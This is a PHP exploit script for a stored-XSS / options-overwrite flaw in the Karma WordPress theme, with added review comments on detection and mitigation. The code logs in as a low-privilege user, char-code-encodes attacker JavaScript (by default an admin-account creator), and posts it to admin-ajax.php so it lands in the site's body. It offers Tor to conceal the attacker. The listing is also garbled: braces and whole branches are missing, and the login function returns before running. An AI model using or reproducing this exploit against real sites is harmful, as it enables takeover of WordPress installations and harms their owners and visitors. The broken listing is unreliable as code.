* Exploit Title: Karma Theme Exploit
 * Version: 4.7
 * Tested on: Debian 8, PHP 5.6.17-3
 * Type: Authenticated Options overwrite, Stored XSS
 * Timeline: Found [28-Apr-2016], Vendor notified [28-Apr-2016], Vendor fixed: [], [RD:1]
// Script entry flow: parse CLI options, optionally announce Tor, ask for an
// interactive confirmation, then (in lines lost from this listing) presumably
// call logIn() and exploit() — confirm against the full file.
$curl = new CurlWrapper();
// -t target URL, -m mode, -u/-p credentials, -f JS file, -c (parsed but never
// read in the visible code), --tor=<value> (the trailing ':' means getopt
// requires a value, e.g. --tor=yes; only its presence is used later).
$options = getopt("t:m:u:p:f:c:",array('tor:'));
// validateInput() returns false on a missing/invalid option, otherwise the
// normalised array (trailing slash on -t, boolean 'tor').
$options = validateInput($options);
if (!$options){
// NOTE(review): the body of this branch, and the closing braces of the blocks
// below, are missing from this listing; the nesting cannot be confirmed here.
if ($options['tor'] === true)
    // Without braces only this echo is conditional on --tor as listed.
    echo " ### USING TOR ###\n";
    // The proxy configuration and the request that fills getResponse() are not
    // visible on this page; only the status messages survive.
    echo "Setting TOR Proxy...\n";
    echo "Checking IPv4 Address\n";
    echo "Got IP : ".$curl->getResponse()."\n";
    echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
    // The stdin handle opened here is never closed or reused.
    $answer = fgets(fopen ("php://stdin","r"));
    if(trim($answer) != 'wololo'){
    echo "OK...\n";
/**
 * Authenticates against wp-login.php with the -u/-p credentials and treats any
 * HTTP status other than 302 as a failed login.
 *
 * NOTE(review): as listed, `return true;` is the first statement, so nothing
 * below it ever runs and no login request is sent — this looks like a leftover
 * stub; confirm against the full file. The closing braces are also missing
 * from this listing.
 */
function logIn(){
    return true;
    global $curl, $options;
    // Field names match the standard WordPress login form; credentials go in the POST body.
    $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>'', 'wp-submit'=>'Log In');
    // validateInput() already appended '/' to -t, so this URL contains '//wp-login.php'.
    $curl->post($options['t'].'/wp-login.php', $data);
    $status =  $curl->getTransferInfo('http_code');
    // Strict comparison only works if the wrapper returns the code as an int — verify.
    if ($status !== 302){
        echo "Login probably failed, aborting...\n";
        // The code that would actually write login.html is not visible in this listing.
        echo "Login response saved to login.html.\n";
/**
 * Stores attacker-supplied JavaScript in the theme's custom body-code option
 * through the theme's admin-ajax handler (the options-overwrite / stored-XSS
 * issue named in the header). Per the usage text a subscriber-level login is
 * enough, which suggests the handler lacks a capability check — confirm against
 * the theme source.
 *
 * Detection: a POST to /wp-admin/admin-ajax.php carrying action=of_ajax_post_action,
 * type=options and a data field containing ka_customcode_body=<script>, from a
 * low-privilege account; the stored option then holds `eval(String.fromCharCode(`
 * rather than readable script text.
 * Mitigation (theme side): gate the handler with current_user_can('edit_theme_options')
 * and a nonce (check_ajax_referer), and sanitise the option before saving it.
 *
 * NOTE(review): the closing braces of the else branch and the for loop are
 * missing from this listing.
 */
function exploit(){
    global $curl, $options;
    if (!isset($options['f'])){
        // Default payload file shipped next to the script; its contents are not on this page.
        $file = 'inject_admin.js';
        $js_code = file_get_contents(dirname(__FILE__).'/'.$file);
    } else {
        // realpath() returns false for a missing path and the result is never checked,
        // so a bad -f value produces a warning and an empty payload rather than an error.
        $js_code = file_get_contents(realpath($options['f']));
    echo "Injecting JS Code:\n\n";
    echo $js_code."\n\n\n";
    // Byte-by-byte char-code encoding of the script; this is the signature a
    // defender can search for in the stored theme options.
    $inject = array();
    for ($i = 0; $i < strlen($js_code); $i++){
        $inject[] = ord($js_code[$i]);
    $inject = 'eval(String.fromCharCode('.implode(',',$inject).'))';
    // No nonce field is included; the request relies on the session cookie alone.
    $data = array('action'=>'of_ajax_post_action', 'type'=>'options', 'data'=>'ka_customcode_body=<script>'.$inject.'</script>');
    echo "Payload ". http_build_query($data) . "\n";
    // As with logIn(), -t already ends in '/', so the URL contains '//wp-admin'.
    $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
    $resp = $curl->getResponse();
    echo $resp;
/**
 * Validates and normalises the getopt() result.
 *
 * Returns false when a required option is missing or malformed, otherwise the
 * option array with a trailing slash on -t and a boolean 'tor' entry. -t must
 * pass FILTER_VALIDATE_URL; -u and -p must be present; -m must be one of
 * wpc/r/i/t (only 'i' is described in the help); mode r additionally needs -f.
 * -c is accepted by getopt but never checked here.
 *
 * NOTE(review): the closing brace of each if is missing from this listing, so
 * the nesting cannot be confirmed from the page.
 */
function validateInput($options){
    // FILTER_VALIDATE_URL checks syntax only — not scheme, reachability or the path.
    if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
        return false;
    if ( !isset($options['u']) ){
        return false;
    if ( !isset($options['p']) ){
        return false;
    // Ensure a trailing slash; callers still prepend '/' to their paths, yielding '//'.
    if (!preg_match('~/$~',$options['t'])){
        $options['t'] = $options['t'].'/';
    // Non-strict in_array/==: tolerable only because getopt normally yields strings here.
    if (!isset($options['m']) || !in_array($options['m'], array('wpc','r','i','t') ) ){
        return false;
    if ($options['m'] == 'r' && !isset($options['f'])){
        return false;
    // --tor must be given with a value (getopt 'tor:'), but only its presence matters.
    $options['tor'] = isset($options['tor']);
    return $options;
/**
 * Prints the usage text to stdout. Only mode 'i' is documented, although
 * validateInput() also accepts wpc/r/t.
 *
 * NOTE(review): the heredoc terminator (EOD;) is missing from this listing, so
 * on this page the final echo appears to fall inside the string.
 */
function showHelp(){
    global $argv;
    // $argv[0] is interpolated so the examples show the script's own name.
    $help = <<<EOD
    Karma Theme Exploit (Theme options overwrite)
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USERNAME] -p [PASSWORD] -m i -f [FILE]
       *** You need to have a valid login (customer or subscriber will do) in order to use this "exploit" **
       [TARGET_URL] http://localhost/wordpress/
       [MODE] i - Inject JavaScript into the body tag.
       [FILE] You can provide a file with the JS code that you want to include in the <body>
              By default it injects an Admin creator JS snippet called inject_admin.js
       php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -m i
       php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -m i -f custom_xss.js
           CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
           @link http://github.com/svyatov/CurlWrapper
           @license http://www.opensource.org/licenses/mit-license.html MIT License
    echo $help."\n\n";